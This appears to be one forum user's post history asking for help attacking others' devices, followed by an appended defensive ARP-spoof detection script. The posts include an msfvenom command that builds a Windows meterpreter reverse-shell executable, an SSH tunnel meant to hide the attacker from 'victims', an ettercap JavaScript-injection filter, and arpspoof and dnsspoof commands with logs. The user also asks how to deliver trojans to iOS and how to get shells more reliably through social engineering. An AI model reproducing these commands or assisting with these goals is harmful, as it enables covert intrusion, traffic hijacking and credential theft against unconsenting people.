kdlsw

Everything posted by kdlsw

  1. I do not have too much experience with iOS. For Android, simple social engineering to get the victim to install the malware APK would be sufficient. But from my understanding, all apps on iOS are required to be installed via the App Store, so if I cannot poison the traffic of the victim, what's the usual way to deliver a trojan or malware to a target? Or are there any good articles/books I can look into? Thanks!
  2. This is exactly what I was trying to do; the entire ssh thing was meant to accomplish this goal, but it did not work. If I run ssh -N -R 80:localhost:80 user@aaa.aaa.aaa.aaa on my "local" console, and run apache on my "local", I was able to access the "local" apache server by accessing aaa.aaa.aaa.aaa:80 from outside. But this trick did not work with metasploit. I mean, if I run ssh -N -R 12345:localhost:12345 user@aaa.aaa.aaa.aaa and set the multi-handler to listen on the local machine at 12345, while the trojan is configured to send a stager or a direct shell to aaa.aaa.aaa.aaa:12345, it doesn't work. How should I do this correctly? Thank you. BTW, the "local" machine was never running an sshd service; it was not an ssh server. It connects to "my server" via ssh -R; "my server" is the one running sshd.
  3. @digip Thank you very much for replying to me. I think I did not address my situation and question clearly, and it led to some misunderstanding; I am sorry about that. I am not trying to let victims connect to my local machine via ssh. I am trying to let them connect to one of my servers via a standard meterpreter reverse tcp connection, and the server will send this connection back to my local machine, like this: Victims--------(reverse tcp)--------> my server-----------(remote SSH)--------->my local kali. The reasons I am doing this are 1: I am inside a LAN, and port forwarding is not very easy here. 2: I do not wish to reveal my local IP address nor an open listening port to the victims. I think this question must have been asked before, since we all use tor and many layers of proxies to hide ourselves in normal forward scans/connections; there must be some similar consideration for remaining anonymous in a reverse shell connection. But I really couldn't find any. This configuration is tested with netcat and apache; local kali is able to receive a connection from the victim machine during the test. It only doesn't work when it comes to meterpreter reverse tcp, in fact, to be more accurate, when it comes to multi handler, because if I set netcat listening on the reverse tcp connection port, I was able to receive some inbound traffic (just not establishing a valid connection, since it is not the right handler). From the victim's machine, no listening port is detected even when I have the multi handler listening, and I tested the handler inside my LAN, where it is working. So, maybe the multi handler is not binding with the ssh tunnel? I apologize for my last unclear description. Please, if there are any solutions or workarounds for this problem, share them with me, thank you!
  4. My kali machine is in a LAN. In order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel:

     ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678

     The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as the ssh port, and 45679 as the reverse connection port. Tested with netcat and an apache server; worked. Now, here is the configuration of the malware generated by msfvenom:

     msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe

     And here is the multi/handler configuration under msf:

     msf exploit(handler) > show options

     Module options (exploit/multi/handler):

        Name  Current Setting  Required  Description
        ----  ---------------  --------  -----------

     Payload options (windows/x64/meterpreter/reverse_tcp):

        Name      Current Setting  Required  Description
        ----      ---------------  --------  -----------
        EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
        LHOST     192.168.0.102    yes       The listen address
        LPORT     45679            yes       The listen port

     Exploit target:

        Id  Name
        --  ----
        0   Wildcard Target

     Then I exploit; nothing happens on the handler, no session received, but the ssh terminal continuously shows the following message once I run the malware on the victim machine:

     connect_to localhost port 45679: failed.
     connect_to localhost port 45679: failed.
     connect_to localhost port 45679: failed.

     I did a scan on aaa.aaa.aaa.aaa:45679; no open port discovered. Since the NC and apache tests work, the SSH tunnel should be functioning properly, so is it the handler's problem? My thought is, the multi handler is somehow not listening/connecting to the tunneled port, but I am not sure how that could happen; doesn't a remote ssh tunnel automatically apply globally once the command is running? Any ideas, or workarounds? This should be a FAQ, yet I couldn't find the right way... Thank you
  5. I found it quite difficult to actually get a shell these days. I am wondering how you guys do it; anyway, here is what I did. On the LAN side, with mitm attack and injection, beef, it's reasonably efficient to harvest credentials, but a little hard to pwn a device; usually I need to send a fake social engineering request to get the victim to run some payloads. Remotely, I can bind some malicious payloads with normal files, and with a lot of social engineering, I can sometimes get a shell, then escalate privilege with my scripts. But these tricks (both LAN and internet) are not always reliable, as they depend heavily on social engineering; people these days don't install programs easily and they check URLs a lot. I am not sure what to do next to get shells more reliably. Are there any better ways to handle it instead of hoping the user is a layman? Should I look into shellcode exploits and client side vulnerabilities? And most consoles are behind a router, which makes a direct vulnerability scan impossible, I assume? Please, any suggestions will be appreciated, thank you!
  6. Thank you, this is helpful! I will try it!
  7. @digip Thanks, I will look into that. So many options for mitm these days; I just tested MITMF, another similar tool, which didn't work too well for me. Hope this one is good. Thank you.
  8. I'm trying to perform a javascript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are from before 2016, and I am not sure if this kind of attack still works now. Anyway, this is my filter script:

     if (ip.proto == TCP && tcp.dst == 80) {
         if (search(DATA.data, "Accept-Encoding")) {
             replace("Accept-Encoding", "Accept-Nothing!");
             msg("zapped Accept-Encoding!\n");
         }
     }
     if (ip.proto == TCP && tcp.dst == 80) {
         if (search(DATA.data, "<head>")) {
             replace("<head>", "<HEAD>");
             msg("Code injected");
         }
     }

     And I run it as:

     ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100//

     test.ef is the compiled filter file. When the victim opens any web page, I get a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the html source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part:

     if (ip.proto == TCP && tcp.dst == 80) {
         replace("<head>", "<HEAD>");
         msg("Code injected");
     }

     the "Code injected" message shows, but the html code on the web client is not changed, which means the problem is that the filter cannot find any named strings (in this case <head>) in the html file; it can only deal with the header (Accept-Encoding). Does anyone know a solution or workaround? Please, any suggestions will be appreciated, thanks
  9. Hi, I did a pentest in a LAN, and some weird things happened. This LAN is a little unusual: there are two routers, say A and B. A is directly connected to an optical fiber, doing PPPoE to the WAN, and has a gateway of 192.168.1.1. B is connected to A, a wireless router, with a gateway of 192.168.0.1. All the clients and my Kali machine are connected to B. The target has an IP of 192.168.0.104. Here is what I did with Kali. I used the following to arp spoof the target and router B:

     arpspoof -i eth0 -t 192.168.0.1 192.168.0.104
     arpspoof -i eth0 -t 192.168.0.104 192.168.0.1
     sysctl -w net.ipv4.ip_forward=1

     Then I did a DNS spoof with:

     dnsspoof -i eth0 -f dnshost.spoof

     It did not work; all the traffic went through my Kali, but the target was still able to access the original webpage. And here comes the weird thing. I stopped the dnsspoof, stopped the ip forwarding with

     sysctl -w net.ipv4.ip_forward=0

     and I started exactly the same dnsspoof as last time again, and it worked! This really confused me, because after that, I tried to start arpspoof and dnsspoof without setting ip_forward to 1 at all, I left it at the default 0, and it did not work, because the arp traffic was not working (which is expected!!). arpspoof and dnsspoof both work ONLY IF the process "ip forwarding is first enabled and then disabled" has completed once, before launching dnsspoof. With ip forwarding only on, dnsspoof doesn't work; with ip forwarding always off, arpspoof doesn't work. Besides that, there are two more strange things I failed to understand. 1, Sometimes, the "ip forward on and off" cycle must be done in the same terminal where the dnsspoof takes place, in order to make it work. Switching on then off in another terminal simply leads to arpspoof failure. 2, Here is the log/feedback of a dnsspoof:

     root@kali:~# dnsspoof -i eth0 -f dnshost.spoof
     dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113]
     192.168.0.104.62290 > 192.168.1.1.53: 4678+ A? www.youtube.com
     192.168.0.104.62290 > 192.168.0.1.53: 4678+ A? www.youtube.com
     192.168.0.104.65063 > 192.168.1.1.53: 31827+ A? www.youtube.com
     192.168.0.104.65063 > 192.168.0.1.53: 31827+ A? www.youtube.com
     192.168.0.104.55426 > 192.168.1.1.53: 51608+ A? www.sina.com
     192.168.0.104.55426 > 192.168.0.1.53: 51608+ A? www.sina.com
     192.168.0.104.54794 > 192.168.1.1.53: 5651+ A? www.sina.com
     192.168.0.104.54794 > 192.168.0.1.53: 5651+ A? www.sina.com
     192.168.0.104.60485 > 192.168.1.1.53: 2950+ A? www.sina.com
     192.168.0.104.63394 > 192.168.1.1.53: 41196+ A? www.facebook.com
     192.168.0.104.63394 > 192.168.0.1.53: 41196+ A? www.facebook.com
     192.168.0.104.52953 > 192.168.1.1.53: 6912+ A? www.facebook.com
     192.168.0.104.52953 > 192.168.0.1.53: 6912+ A? www.facebook.com
     ^Croot@kali:~# dnsspoof -i eth0 -f dnshost.spoof
     dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113]
     192.168.0.104.53807 > 192.168.1.1.53: 60485+ A? www.youtube.com
     192.168.0.104.53807 > 192.168.1.1.53: 60485+ A? www.youtube.com
     192.168.0.104.50239 > 192.168.1.1.53: 28894+ A? www.sina.com
     192.168.0.104.50239 > 192.168.1.1.53: 28894+ A? www.sina.com

     The second launch was a failed one; the first one succeeded. The router I am targeting should be 192.168.0.1, router B. In the second launch, it is interacting with only router A (192.168.1.1). I am not sure what that means and if it has something to do with the failure directly, because in the next few attempts, a feedback situation like this second launch worked sometimes. I am almost 100% sure this issue was due to the two routers, but I am still not able to understand why, or even find a way to make it always work. Please, any suggestion will be appreciated! Thanks
  10. Thank you! I will take a look on them, thanks!
  11. I know it was possible to embed some malware into a web page back in the days when the JDB method worked. Is it possible to execute malware on the client simply by letting it browse a web page these days? Thanks!
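A defender-side counterpart to the arpspoof commands in post 9, added here as an example and not taken from any of the posts: the two arpspoof invocations make one MAC (the Kali box) answer for both 192.168.0.1 and 192.168.0.104, so a passive monitor can flag exactly that pattern. The MAC addresses and the reply feed below are constructed; a real feed would come from tcpdump -n -e arp or an arpwatch log.

```python
"""Detect ARP cache poisoning from a stream of observed ARP replies.

Two signals are checked, matching what arpspoof does on the wire:
  1. an IP that was seen at one MAC starts being announced at another
  2. a single MAC ends up claiming more than one IP address
"""
from collections import defaultdict

# Constructed sample values (not observed on any real network).
ROUTER_B = "192.168.0.1"
TARGET = "192.168.0.104"
ROUTER_B_MAC = "aa:bb:cc:00:00:01"   # constructed
TARGET_MAC = "aa:bb:cc:00:00:04"     # constructed
ATTACKER_MAC = "de:ad:be:ef:00:99"   # constructed placeholder

# (timestamp, sender IP, sender MAC) as a sniffer would see ARP replies.
SAMPLE_REPLIES = [
    (1, ROUTER_B, ROUTER_B_MAC),
    (2, TARGET, TARGET_MAC),
    (3, ROUTER_B, ATTACKER_MAC),   # "192.168.0.1 is at <attacker>" sent to the target
    (4, TARGET, ATTACKER_MAC),     # "192.168.0.104 is at <attacker>" sent to the router
    (5, ROUTER_B, ATTACKER_MAC),   # arpspoof repeats the lie every couple of seconds
]


def detect_arp_spoof(replies, trusted=None):
    """Return a list of alert tuples; `trusted` pins known IP->MAC bindings."""
    pinned = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    seen = dict(pinned)                 # current IP -> MAC view
    ips_by_mac = defaultdict(set)       # reverse view: MAC -> set of IPs
    for ip, mac in seen.items():
        ips_by_mac[mac].add(ip)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        prev = seen.get(ip)
        if prev is not None and prev != mac:
            alerts.append((ts, "mac_change", ip, prev, mac))
        if ip not in pinned:            # pinned entries are never overwritten
            seen[ip] = mac
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1:
                alerts.append((ts, "one_mac_many_ips", mac, tuple(sorted(ips_by_mac[mac]))))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES):
        print(*alert)
```

Pinning the gateway's real MAC via `trusted` keeps every repeated spoof reply visible as a fresh mac_change alert instead of letting the poisoned binding become the new baseline.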